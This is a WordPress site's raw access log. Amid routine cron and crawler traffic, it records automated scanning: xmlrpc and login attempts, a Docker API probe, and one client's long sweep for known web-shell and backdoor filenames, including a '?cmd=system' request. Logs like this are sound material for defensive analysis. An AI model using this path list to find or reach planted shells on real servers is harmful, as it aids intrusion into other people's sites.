180.153.236.147 - - [25/Nov/2025:14:56:24 +0800] "GET / HTTP/1.1" 200 33988 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [25/Nov/2025:15:10:02 +0800] "POST /wp-cron.php?doing_wp_cron=1764054602.0837879180908203125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
20.65.194.142 - - [25/Nov/2025:15:10:02 +0800] "GET /portal/redlion HTTP/1.1" 404 8988 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [25/Nov/2025:15:13:44 +0800] "POST /wp-cron.php?doing_wp_cron=1764054824.0547280311584472656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
176.65.148.16 - - [25/Nov/2025:15:13:44 +0800] "GET /index.htm HTTP/1.1" 301 5 "-" "Mozilla/5.0"
176.65.148.16 - - [25/Nov/2025:15:13:53 +0800] "GET / HTTP/1.1" 200 152189 "-" "-"
36.133.115.36 - - [25/Nov/2025:15:13:59 +0800] "POST /wp-cron.php?doing_wp_cron=1764054839.8767380714416503906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
203.2.64.59 - - [25/Nov/2025:15:14:00 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Nov/2025:15:14:53 +0800] "POST /wp-cron.php?doing_wp_cron=1764054893.2094039916992187500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
5.187.35.21 - - [25/Nov/2025:15:14:54 +0800] "GET / HTTP/1.1" 200 152189 "-" "-"
36.133.115.36 - - [25/Nov/2025:15:16:06 +0800] "POST /wp-cron.php?doing_wp_cron=1764054966.2379260063171386718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
20.65.154.130 - - [25/Nov/2025:15:16:06 +0800] "GET /hudson HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [25/Nov/2025:15:24:15 +0800] "POST /wp-cron.php?doing_wp_cron=1764055455.6575610637664794921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
85.214.167.117 - - [25/Nov/2025:15:24:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0"
36.133.115.36 - - [25/Nov/2025:15:26:16 +0800] "POST /wp-cron.php?doing_wp_cron=1764055576.3075079917907714843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
87.120.191.125 - - [25/Nov/2025:15:26:16 +0800] "GET / HTTP/1.1" 200 33525 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
35.215.113.119 - - [25/Nov/2025:15:26:55 +0800] "GET / HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Nov/2025:15:26:56 +0800] "POST /wp-cron.php?doing_wp_cron=1764055616.7354900836944580078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
35.215.113.119 - - [25/Nov/2025:15:26:56 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36"
35.215.113.119 - - [25/Nov/2025:15:27:00 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 17879 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36"
35.215.113.119 - - [25/Nov/2025:15:27:02 +0800] "GET /portfolio-category/remaining-rolls/ HTTP/1.1" 200 20956 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36"
35.215.113.119 - - [25/Nov/2025:15:27:06 +0800] "GET /policy/ HTTP/1.1" 200 23711 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36"
35.215.113.119 - - [25/Nov/2025:15:27:06 +0800] "GET /ads.txt HTTP/1.1" 200 25198 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.3; rb.gy/qyzae5) Chrome/124.0.0.0 Safari/537.36"
116.179.32.26 - - [25/Nov/2025:15:37:38 +0800] "GET / HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [25/Nov/2025:15:42:59 +0800] "POST /wp-cron.php?doing_wp_cron=1764056579.9322700500488281250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.41.165.59 - - [25/Nov/2025:15:42:59 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [25/Nov/2025:16:13:41 +0800] "POST /wp-cron.php?doing_wp_cron=1764058421.4647469520568847656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.30.250.54 - - [25/Nov/2025:16:13:42 +0800] "GET / HTTP/1.1" 200 152189 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
36.133.115.36 - - [25/Nov/2025:16:15:55 +0800] "POST /wp-cron.php?doing_wp_cron=1764058555.1935389041900634765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
171.244.0.91 - - [25/Nov/2025:16:15:55 +0800] "GET /wp-login.php HTTP/1.1" 200 2782 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
171.244.0.91 - - [25/Nov/2025:16:15:56 +0800] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
82.223.66.26 - - [25/Nov/2025:16:16:41 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0"
36.133.115.36 - - [25/Nov/2025:16:33:37 +0800] "POST /wp-cron.php?doing_wp_cron=1764059617.2253179550170898437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.34.213.150 - - [25/Nov/2025:16:33:37 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Nov/2025:16:47:11 +0800] "POST /wp-cron.php?doing_wp_cron=1764060431.2679278850555419921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.34.213.150 - - [25/Nov/2025:16:47:11 +0800] "GET / HTTP/1.1" 200 109842 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
36.133.115.36 - - [25/Nov/2025:16:49:24 +0800] "POST /wp-cron.php?doing_wp_cron=1764060564.0715539455413818359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
5.187.35.21 - - [25/Nov/2025:16:49:24 +0800] "GET / HTTP/1.1" 200 152189 "-" "-"
36.133.115.36 - - [25/Nov/2025:17:04:14 +0800] "POST /wp-cron.php?doing_wp_cron=1764061454.3971810340881347656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.130.105.21 - - [25/Nov/2025:17:04:14 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.105.21 - - [25/Nov/2025:17:04:16 +0800] "GET / HTTP/1.1" 200 33525 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Nov/2025:17:07:39 +0800] "POST /wp-cron.php?doing_wp_cron=1764061659.4955060482025146484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
220.181.108.105 - - [25/Nov/2025:17:07:39 +0800] "GET /2052/ HTTP/1.1" 200 25966 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [25/Nov/2025:17:12:57 +0800] "POST /wp-cron.php?doing_wp_cron=1764061977.6163609027862548828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
147.185.133.0 - - [25/Nov/2025:17:12:57 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [25/Nov/2025:17:18:40 +0800] "POST /wp-cron.php?doing_wp_cron=1764062320.2339920997619628906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
194.60.201.200 - - [25/Nov/2025:17:18:40 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
103.203.57.3 - - [25/Nov/2025:17:18:41 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [25/Nov/2025:17:44:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764063845.7658579349517822265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.121 - - [25/Nov/2025:17:44:05 +0800] "HEAD /containers/json HTTP/1.1" 404 0 "-" "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)"
36.133.115.36 - - [25/Nov/2025:17:47:59 +0800] "POST /wp-cron.php?doing_wp_cron=1764064079.8049569129943847656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.157.67.70 - - [25/Nov/2025:17:48:00 +0800] "GET / HTTP/1.1" 200 33525 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [25/Nov/2025:18:05:54 +0800] "POST /wp-cron.php?doing_wp_cron=1764065154.7319159507751464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
5.187.35.21 - - [25/Nov/2025:18:05:55 +0800] "GET / HTTP/1.1" 200 152189 "-" "-"
36.133.115.36 - - [25/Nov/2025:18:23:44 +0800] "POST /wp-cron.php?doing_wp_cron=1764066224.3967859745025634765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
188.165.95.76 - - [25/Nov/2025:18:23:44 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
220.181.108.169 - - [25/Nov/2025:18:37:39 +0800] "GET /portfolio-category/remaining-rolls/ HTTP/1.1" 200 20976 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [25/Nov/2025:18:37:39 +0800] "POST /wp-cron.php?doing_wp_cron=1764067059.7593150138854980468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
220.181.108.156 - - [25/Nov/2025:18:37:40 +0800] "GET /2214/ HTTP/1.1" 200 24931 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.226 - - [25/Nov/2025:18:37:42 +0800] "GET /wp-content/uploads/2025/07/1753455746-DSC01472-150x150.webp HTTP/1.1" 200 4760 "http://cqqizhou.com/2214/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
194.163.129.51 - - [25/Nov/2025:18:54:56 +0800] "GET /admin/config.php HTTP/1.0" 404 16 "-" "xfa1"
36.133.115.36 - - [25/Nov/2025:18:57:18 +0800] "POST /wp-cron.php?doing_wp_cron=1764068238.6413269042968750000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
194.163.129.51 - - [25/Nov/2025:18:57:18 +0800] "GET /robots.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0"
194.163.129.51 - - [25/Nov/2025:18:57:19 +0800] "GET /robots.txt HTTP/1.1" 499 0 "http://36.133.115.36:80/robots.txt" "Mozilla/5.0"
193.37.32.105 - - [25/Nov/2025:19:06:26 +0800] "GET /wp-content/plugins/advanced-product-fields-for-woocommerce/db.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:27 +0800] "GET /wp-content/plugins/so-pinyin-slugs/inc/main_json.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:27 +0800] "GET /3PJcpMFsD8B.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:27 +0800] "GET /5PJcpMFsD8B.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:28 +0800] "GET /image/5PJcpMFsD8B.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:28 +0800] "GET /export.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:28 +0800] "GET /network_xo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:29 +0800] "GET /hplfuns.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:30 +0800] "GET /wp-content/themes/theme-check/main.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.105 - - [25/Nov/2025:19:06:35 +0800] "GET /wp-admin/network/ HTTP/1.1" 499 0 "-" "Go-http-client/1.1"
36.133.115.36 - - [25/Nov/2025:19:06:36 +0800] "POST /wp-cron.php?doing_wp_cron=1764068796.3259820938110351562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.37.32.61 - - [25/Nov/2025:19:06:36 +0800] "GET /wp-links-opml.php HTTP/1.1" 200 176 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:36 +0800] "GET /wp-content/themes/covr-wpcom/assets/fonts/manrope_normal.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:37 +0800] "GET /wp-content/makeasmtp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:37 +0800] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:37 +0800] "GET /wp-content/222.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:37 +0800] "GET /wp-content/plugins/phpad/as.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:38 +0800] "GET /wp-content/updates.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:38 +0800] "GET /wp-includes/images/wp-login.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:38 +0800] "GET /form.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:39 +0800] "GET /wp-json/wp/v2/posts?cmd=system HTTP/1.1" 200 35079 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:39 +0800] "GET /wp-content/plugins/wp-parsidate/includes/admin/acf-fields-adyrui.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:40 +0800] "GET /wp-admin/asasx.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:40 +0800] "GET /wp-content/themes/aback.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:40 +0800] "GET /new.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:41 +0800] "GET /ad.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:42 +0800] "GET /moderation.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
36.133.115.36 - - [25/Nov/2025:19:06:42 +0800] "POST /wp-cron.php?doing_wp_cron=1764068802.2183370590209960937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.37.32.61 - - [25/Nov/2025:19:06:42 +0800] "GET /wp-content/themes/classwithtostring.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:42 +0800] "GET /test.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:42 +0800] "GET /themes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:43 +0800] "GET /jindex.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:43 +0800] "GET /wso.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:43 +0800] "GET /wp-includes/Text/network.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:43 +0800] "GET /wp-content/plugins/erinyani/default.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:44 +0800] "GET /leaf.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:44 +0800] "GET /past.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:44 +0800] "GET /z.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:44 +0800] "GET /wp-content/plugins/ioxi/ioxi/dropdown.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:45 +0800] "GET /wp-content/plugins/mainhosting/default.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:45 +0800] "GET /wp-content/plugins/about.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:45 +0800] "GET /inc.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:46 +0800] "GET /system_log.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:46 +0800] "GET /gg.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:47 +0800] "GET /sim.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:47 +0800] "GET /admin/function.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:47 +0800] "GET /core.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:47 +0800] "GET /mail.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:48 +0800] "GET /wp-content/themes/about.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:48 +0800] "GET /xml.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:48 +0800] "GET /css.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:48 +0800] "GET /images/class-config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:49 +0800] "GET /g.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:49 +0800] "GET /wp-mail.php HTTP/1.1" 403 1114 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:50 +0800] "GET /default.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:50 +0800] "GET /back.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:50 +0800] "GET /wp-admin/wp-conflg.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:50 +0800] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:51 +0800] "GET /content.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:51 +0800] "GET /leafmailer2.8.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:51 +0800] "GET /modules/mod_simplefileuploadv1.3/elements/filemanager.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:51 +0800] "GET /modules/mod_simplefileuploadv1.3/elements/up.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:52 +0800] "GET /wsa.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:52 +0800] "GET /f35.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:52 +0800] "GET /wp-l0gin.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:53 +0800] "GET /abcd.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:53 +0800] "GET /aa.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:53 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:54 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:55 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 2782 "http://cqqizhou.com/wp-admin/" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:55 +0800] "GET /classwithtostring.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:56 +0800] "GET /wp-content/autoload_classmap/function.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:56 +0800] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:57 +0800] "GET /cgi-bin/ HTTP/1.1" 404 8989 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:57 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:57 +0800] "GET /wp-admin/js/widgets/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:58 +0800] "GET /buy.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:58 +0800] "GET /wp-file.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:58 +0800] "GET /chosen.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:59 +0800] "GET /dropdown.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:06:59 +0800] "GET /alfa.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:00 +0800] "GET /wp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:00 +0800] "GET /nf_tracking.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:00 +0800] "GET /nc4.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:01 +0800] "GET /wp-content/admin.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:01 +0800] "GET /wp-includes/blocks/comments/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:01 +0800] "GET /wp-admin/js/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:02 +0800] "GET /wp-admin/network/natural.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:02 +0800] "GET /index.php HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:03 +0800] "GET / HTTP/1.1" 200 33988 "http://cqqizhou.com/index.php" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:04 +0800] "GET /wp-content/wp-conflg.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:04 +0800] "GET /wp-includes/block-bindings/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:05 +0800] "GET /admin.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:05 +0800] "GET /wp-includes/Text/about.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:06 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 146 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:06 +0800] "GET /wp-content/about.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:06 +0800] "GET /worksec.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:06 +0800] "GET /makeasmtp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:07 +0800] "GET /k.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:07 +0800] "GET /wp-content/function.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:08 +0800] "GET /wp-admin/about.php HTTP/1.1" 302 5 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:09 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2Fabout.php&reauth=1 HTTP/1.1" 200 2787 "http://cqqizhou.com/wp-admin/about.php" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:10 +0800] "GET /images/ HTTP/1.1" 404 8988 "-" "Go-http-client/1.1"
193.37.32.61 - - [25/Nov/2025:19:07:10 +0800] "GET /fast.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
